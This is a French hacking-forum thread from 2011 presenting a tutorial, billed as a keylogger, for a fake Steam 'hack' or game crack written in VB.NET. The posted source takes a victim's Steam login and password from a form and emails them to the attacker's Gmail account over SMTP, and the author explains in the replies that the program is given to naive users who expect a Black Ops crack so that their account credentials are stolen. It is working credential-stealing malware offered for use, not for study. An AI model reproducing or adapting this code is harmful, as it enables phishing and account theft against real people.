[TUTO] Keylogger avec VB8


 
Poster un nouveau sujet   Répondre au sujet    Gold-Hacking Index du Forum -> French - Hacking -> Hacking Tutorials -> Tutorial Vidéo
Sujet précédent :: Sujet suivant  
Auteur Message
akah
Invité

Hors ligne




MessagePosté le: Sam 1 Jan - 22:42 (2011)    Sujet du message: [TUTO] Keylogger avec VB8 Répondre en citant

Voici un petit tuto pour créer un keylogger avec VB8
PS: monter le son au max ^^

Le code source :
Imports System.Net.Mail
Public Class Form1

    Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
        ProgressBar1.Value = ProgressBar1.Value + 1
        If ProgressBar1.Value = ProgressBar1.Maximum Then
            ProgressBar1.Value = 0
            Timer1.Stop()
            Timer1.Enabled = False
            TextBox1.Enabled = True
            TextBox2.Enabled = True
           

        End If
    End Sub
    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Dim MyMailMessage As New MailMessage()
        Dim SMTPServer As New SmtpClient("smtp.gmail.com")
        'Email
        MyMailMessage.From = New MailAddress("VOTRE ADRESSE GMAIL") 'Destinataire
        MyMailMessage.To.Add("VOTRE ADRESSE GMAIL") 'Expéditeur
        MyMailMessage.Subject = ("[] STEAM HACK") 'Sujet
        MyMailMessage.Body = ("Login: " & TextBox1.Text & " Pass: " & TextBox2.Text) 'Corps
        'SMTP
        SMTPServer.Port = ("587")
        SMTPServer.Credentials = New System.Net.NetworkCredential("VOTRE..", "VOTRE MOT DE PASSE GMAIL") 'Email (+Pass)
        SMTPServer.EnableSsl = True
        Try
            SMTPServer.Send(MyMailMessage)
        Catch ex As Exception
        End Try
        Timer1.Enabled = True
        Timer1.Start()
        Timer1.Interval = 500 ' = 1min
        TextBox1.Enabled = False
        TextBox2.Enabled = False

    End Sub
    Private Sub TextBox1_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles TextBox1.TextChanged
    End Sub
End Class


Et la vidéo ;)


Revenir en haut
Publicité






MessagePosté le: Sam 1 Jan - 22:42 (2011)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Revenir en haut
xblade
Invité

Hors ligne




MessagePosté le: Sam 1 Jan - 23:41 (2011)    Sujet du message: [TUTO] Keylogger avec VB8 Répondre en citant

tu est sur qu'il marche?
ta deja testé?


Revenir en haut
akah
Invité

Hors ligne




MessagePosté le: Sam 1 Jan - 23:56 (2011)    Sujet du message: [TUTO] Keylogger avec VB8 Répondre en citant

Ouais tu fait tout correctement après tu donne sa a un (NOOB) il croit qu'il va recevoir un crack pour black ops et non moi je reçois sont ID steam et mdp steam ;)

Revenir en haut
valix
Invité

Hors ligne




MessagePosté le: Dim 2 Jan - 10:55 (2011)    Sujet du message: [TUTO] Keylogger avec VB8 Répondre en citant

jolie ;) j'appelle pas sa un keylogger ^^ mais pour un noob sa passe tout seul ^^

Revenir en haut
aRseNaL_KiLLeuR
Invité

Hors ligne




MessagePosté le: Dim 2 Jan - 11:09 (2011)    Sujet du message: [TUTO] Keylogger avec VB8 Répondre en citant

Comme le dit le titre de la vidéo :


FAUX CRACK 


Revenir en haut
akah
Invité

Hors ligne




MessagePosté le: Dim 2 Jan - 11:18 (2011)    Sujet du message: [TUTO] Keylogger avec VB8 Répondre en citant

Qu'entend tu par "FAUX CRACK" ?
Et oui ce n'est pas un keylogger mais un logiciel PIÊGE ^^
Oui pour un noob voir un peu de logique il tomberont dedans facilement x)


Revenir en haut
aRseNaL_KiLLeuR
Invité

Hors ligne




MessagePosté le: Dim 2 Jan - 11:45 (2011)    Sujet du message: [TUTO] Keylogger avec VB8 Répondre en citant

C'est dans le titre de la vidéo ...

Revenir en haut
xblade
Invité

Hors ligne




MessagePosté le: Dim 2 Jan - 12:14 (2011)    Sujet du message: [TUTO] Keylogger avec VB8 Répondre en citant

ouai mais bon,
meme les noobs aurait quand meme des doutes. .


Revenir en haut
akah
Invité

Hors ligne




MessagePosté le: Dim 2 Jan - 16:11 (2011)    Sujet du message: [TUTO] Keylogger avec VB8 Répondre en citant

Sa se choisi un bon noob mdr

Revenir en haut
Contenu Sponsorisé






MessagePosté le: Aujourd’hui à 06:37 (2017)    Sujet du message: [TUTO] Keylogger avec VB8

Revenir en haut
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet    Gold-Hacking Index du Forum ->
   Tutorial Vidéo
Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

 
Sauter vers:  
Index | créer un forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation